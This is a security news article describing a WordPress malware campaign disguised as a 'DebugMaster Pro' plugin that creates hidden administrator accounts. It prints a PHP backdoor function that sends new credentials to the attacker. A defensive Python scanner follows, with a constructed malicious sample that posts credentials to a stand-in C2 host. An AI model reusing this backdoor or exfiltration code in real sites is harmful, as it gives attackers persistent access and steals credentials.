WordPress Websites Got Exploited by Hackers with Silent Malware to Gain Admin Access
“As you know, many websites are built on WordPress, and many of them can be affected by malware. A recent case involves Silent Malware.”
A sophisticated malware campaign targeting WordPress websites has been found to combine persistent backdoor mechanisms with steganographic concealment techniques to retain unauthorized administrator access.
The malware consists of two major components that work together, allowing attackers to establish long-lived footholds on compromised websites while evading conventional security controls.
The attack begins with the deployment of malicious files that pose as legitimate WordPress components.
To evade discovery, these files use several layers of obfuscation and encoding, and they create administrator accounts with hardcoded credentials so that attackers keep their access long after the initial breach is identified.
By abusing both the plugin infrastructure and core user-management functions, the malware demonstrates a deep understanding of WordPress’s internals and creates persistent access points.
In addition to creating accounts, the malware communicates with command-and-control servers to automatically send the harvested credentials and system data to endpoints under the attacker’s control.
This makes it possible for threat actors to create vast networks of compromised WordPress installations by simultaneously harvesting administrative access credentials from several compromised sites.
During regular security cleanups, Sucuri analysts discovered the malware and noted its advanced persistence mechanisms, which actively thwart attempts to remove it.
The impact of the malware goes beyond unauthorized access: it may also allow attackers to inject malicious content, redirect users to phishing websites, harvest private data, or deliver further malicious payloads.
For website owners, who might not be aware of the compromise for a long time while attackers continue to have silent access to their systems, this campaign is especially risky due to its combination of stealth methods and persistent mechanisms.
Superior Stealth and Persistence Mechanisms
The malware uses a dual-file strategy that guarantees redundant access channels, a notably deliberate approach to persistence.
The main component poses as the “DebugMaster Pro” plugin, complete with believable metadata such as GitHub repositories, version numbers, and expert descriptions.

Beneath this exterior, though, is highly obfuscated code intended to generate administrator accounts and open channels of communication with outside servers.
```php
public function create_admin_user() {
    // Run only once: the flag lives in wp_options and is refreshed 30 days ahead.
    if (get_option($this->init_flag, false)) return;
    $creds = $this->generate_credentials();
    if (!username_exists($creds["user"])) {
        $user_id = wp_create_user($creds["user"], $creds["pass"], $creds["email"]);
        if (!is_wp_error($user_id)) {
            $user = new WP_User($user_id);
            $user->set_role("administrator");
        }
    }
    $this->send_credentials($creds);   // report the new account to the attacker's endpoint
    update_option($this->init_flag, time() + 86400 * 30);
}
```
To evade detection by automated security tools and manual examination, the malware employs a variety of evasion tactics.
It hides its administrator accounts from the standard user-management interface and removes itself from the WordPress plugin listing by filtering the underlying queries.

The code obfuscates its true operation with goto statements and excessive hexadecimal encoding, making static analysis much more difficult for security experts.
To keep its malicious functionality hidden from site administrators, the malware also whitelists known administrative IP addresses and tracks IPs to recognize administrator access patterns.
This selective visibility shows a comprehensive awareness of operational security principles usually associated with advanced persistent threat groups, ensuring that the malware continues to operate against regular users while remaining concealed from website owners.
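As an added defensive example (not code from the article or from Sucuri), the scanner below turns the behaviours described in this section into static heuristics that can be run over a site's plugin files. The hook names `pre_user_query` and `all_plugins` used for hiding users and plugins, the `min_hits` threshold and both sample sources are assumptions constructed for this illustration.

```python
import re
from pathlib import Path

# One regex per behaviour the article attributes to the malware. The hook
# names for hiding users/plugins are an assumption, not from the article.
INDICATORS = {
    "creates_admin":   re.compile(r"wp_create_user\s*\(.*?set_role\s*\(\s*['\"]administrator['\"]", re.S),
    "hex_obfuscation": re.compile(r"(?:\\x[0-9a-fA-F]{2}){4,}"),
    "goto_flow":       re.compile(r"\bgoto\s+\w+\s*;"),
    "hides_users":     re.compile(r"add_(?:filter|action)\s*\(\s*['\"]pre_user_query['\"]"),
    "hides_plugin":    re.compile(r"add_filter\s*\(\s*['\"]all_plugins['\"]"),
    "outbound_post":   re.compile(r"\b(?:wp_remote_post|curl_init)\s*\("),
    "thirty_day_flag": re.compile(r"86400\s*\*\s*30"),
}

def scan_source(source: str) -> list[str]:
    """Return the indicator names found in one PHP source string."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]

def scan_plugins(plugins_dir: str, min_hits: int = 2) -> dict[str, list[str]]:
    """Scan every .php file under a plugins directory; a single hit is common
    in legitimate plugins, so only files reaching min_hits are reported."""
    findings = {}
    for php in Path(plugins_dir).rglob("*.php"):
        hits = scan_source(php.read_text(errors="replace"))
        if len(hits) >= min_hits:
            findings[str(php)] = hits
    return findings

# Constructed sample mirroring the article's description (not the real malware).
SUSPICIOUS_SAMPLE = r"""<?php
add_filter('all_plugins', function ($p) { unset($p['dbg/dbg.php']); return $p; });
add_action('pre_user_query', 'dbg_hide_user');
function dbg_setup($creds) {
    $id = wp_create_user("\x73\x75\x70\x70\x6f\x72\x74", $creds['pass'], $creds['email']);
    $u = new WP_User($id); $u->set_role("administrator");
    goto send;
    send:
    wp_remote_post('https://c2.example.invalid/collect', ['body' => $creds]);
    update_option('dbg_flag', time() + 86400 * 30);
}
"""

# Constructed benign plugin: registers a shortcode and nothing else.
BENIGN_SAMPLE = r"""<?php
add_shortcode('hello', function () { return esc_html__('Hello', 'hello'); });
"""
```

Run `scan_plugins("/path/to/wp-content/plugins")` to list files that trip two or more heuristics; treat the output as a triage list for manual review, not as a verdict.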
About The Author
Suraj Koli is a content specialist in technical writing about cybersecurity & information security. He has written many articles on cybersecurity concepts, the latest trends in cyber awareness and ethical hacking.